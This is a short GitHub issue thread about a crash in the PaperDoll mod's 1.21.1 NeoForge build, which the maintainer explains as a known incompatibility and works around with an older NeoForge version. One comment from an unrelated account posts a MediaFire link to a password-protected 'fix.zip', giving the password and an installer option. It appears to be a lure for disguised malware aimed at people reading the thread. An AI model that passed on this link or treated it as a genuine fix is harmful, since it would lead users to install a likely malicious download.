### ISSUE TITLE
1.21.1 Neo variant, crash when clicking the `Config` in mods list

### ISSUE THREAD

**Issue by 3gf8jv4dv** [tr7zw/PaperDoll#39]
Crash Report *(Deleted)*

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tr7zw** [comment]
Its a known issue due to an incompatible change done by Neo later on. Please dont open more issues^^.

**Comment by tr7zw** [comment]
No, you can work around it by just using an older version of 1.21 neo. Didnt have time to implement the changes for 1.21.1, and doing that now will break it for anyone where its working so far. It sucks that modloaders do stuff like this.
